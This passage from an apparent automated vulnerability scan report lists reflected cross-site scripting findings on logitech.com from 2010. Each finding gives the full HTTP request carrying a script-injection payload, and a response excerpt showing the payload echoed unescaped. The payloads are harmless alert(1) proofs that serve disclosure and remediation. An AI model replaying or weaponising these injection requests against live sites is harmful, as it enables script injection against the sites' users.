           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/mobile.cssb39ea</script><script>alert(1)</script>b88e47674bb' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.155. http://www.logitech.com/css/v2/promotion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/promotion.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc9d"><script>alert(1)</script>ad36cb01ee0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/promotion.css4fc9d"><script>alert(1)</script>ad36cb01ee0 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/promotion.css4fc9d"><script>alert(1)</script>ad36cb01ee0">
...[SNIP]...

1.156. http://www.logitech.com/css/v2/promotion.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/promotion.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0933</script><script>alert(1)</script>188d5e56fa9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/promotion.csse0933</script><script>alert(1)</script>188d5e56fa9 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/promotion.csse0933</script><script>alert(1)</script>188d5e56fa9' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.157. http://www.logitech.com/css/v2/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/search.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b620"><script>alert(1)</script>b75ea8aed41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/search.css3b620"><script>alert(1)</script>b75ea8aed41 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/search?q=%60
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:16 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/search.css3b620"><script>alert(1)</script>b75ea8aed41">
...[SNIP]...

1.158. http://www.logitech.com/css/v2/search.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/search.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbdff</script><script>alert(1)</script>322e8945bf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/search.cssdbdff</script><script>alert(1)</script>322e8945bf5 HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/search?q=%60
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:23 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/search.cssdbdff</script><script>alert(1)</script>322e8945bf5' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.159. http://www.logitech.com/css/v2/showcase.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/showcase.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7df8a"><script>alert(1)</script>ab912e18d42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/showcase.css7df8a"><script>alert(1)</script>ab912e18d42 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/showcase.css7df8a"><script>alert(1)</script>ab912e18d42">
...[SNIP]...

1.160. http://www.logitech.com/css/v2/showcase.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/showcase.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e47d</script><script>alert(1)</script>84ef89d4f23 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/showcase.css3e47d</script><script>alert(1)</script>84ef89d4f23 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:00:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/showcase.css3e47d</script><script>alert(1)</script>84ef89d4f23' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.161. http://www.logitech.com/css/v2/subnav.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/subnav.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e27d7"><script>alert(1)</script>02d0fb5f3cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/v2/subnav.csse27d7"><script>alert(1)</script>02d0fb5f3cf HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:19 GMT
Connection: keep-alive
Content-Length: 31383


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="css/v2/subnav.csse27d7"><script>alert(1)</script>02d0fb5f3cf">
...[SNIP]...

1.162. http://www.logitech.com/css/v2/subnav.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /css/v2/subnav.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bbe56</script><script>alert(1)</script>ae944f1784a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/v2/subnav.cssbbe56</script><script>alert(1)</script>ae944f1784a HTTP/1.1
Accept: */*
Referer: http://www.logitech.com/en-us/webcam-communications
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:26 GMT
Connection: keep-alive
Content-Length: 31415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','css/v2/subnav.cssbbe56</script><script>alert(1)</script>ae944f1784a' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.163. http://www.logitech.com/en-us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79af2"><script>alert(1)</script>b47b84ef801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us79af2"><script>alert(1)</script>b47b84ef801 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us79af2"><script>alert(1)</script>b47b84ef801">
...[SNIP]...

1.164. http://www.logitech.com/en-us [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a79c4</script><script>alert(1)</script>ed223318e31 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-usa79c4</script><script>alert(1)</script>ed223318e31 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:52:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-usa79c4</script><script>alert(1)</script>ed223318e31' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.165. http://www.logitech.com/en-us [seo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of the seo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88f1f</script><script>alert(1)</script>5a9cd263270 was submitted in the seo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us?seo=349/707388f1f</script><script>alert(1)</script>5a9cd263270&geo=US HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-us,349/707388f1f</script><script>alert(1)</script>5a9cd263270' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.166. http://www.logitech.com/en-us [seo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us

Issue detail

The value of the seo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae65f"><script>alert(1)</script>7da9abf12e9 was submitted in the seo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us?seo=349/7073ae65f"><script>alert(1)</script>7da9abf12e9&geo=US HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.logitech.com/349/7073

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us,349/7073ae65f"><script>alert(1)</script>7da9abf12e9">
...[SNIP]...

1.167. http://www.logitech.com/en-us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b54"><script>alert(1)</script>7be0a39aa14 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-usc2b54"><script>alert(1)</script>7be0a39aa14/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-usc2b54"><script>alert(1)</script>7be0a39aa14">
...[SNIP]...

1.168. http://www.logitech.com/en-us/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d951</script><script>alert(1)</script>e786a4bffbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us9d951</script><script>alert(1)</script>e786a4bffbe/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','en-us9d951</script><script>alert(1)</script>e786a4bffbe' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.169. http://www.logitech.com/en-us/1039 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa14"%3bd632a6ba26b was submitted in the REST URL parameter 1. This input was echoed as 6aa14";d632a6ba26b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en-us6aa14"%3bd632a6ba26b/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/en-us6aa14";d632a6ba26b/1039";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.170. http://www.logitech.com/en-us/1039 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e340"><script>alert(1)</script>e5843c6de3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us4e340"><script>alert(1)</script>e5843c6de3/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="en-us4e340"><script>alert(1)</script>e5843c6de3/1039">
...[SNIP]...

1.171. http://www.logitech.com/en-us/1039 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 26c54</script><script>alert(1)</script>7bff87b4bb6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /26c54</script><script>alert(1)</script>7bff87b4bb6/1039 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','26c54</script><script>alert(1)</script>7bff87b4bb6/1039' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.172. http://www.logitech.com/en-us/1039 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /en-us/1039

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13909"><script>alert(1)</script>8a551f0facc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en-us/103913909"><script>alert(1)</script>8a551f0facc HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: CRID=; P_SEARCH_TEXT=; LT_PRODUCT_ID=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:42:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="103913909"><script>alert(1)</script>8a551f0facc">
...[SNIP]...

1.173. http://www.logitech.com/en-us/1039 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
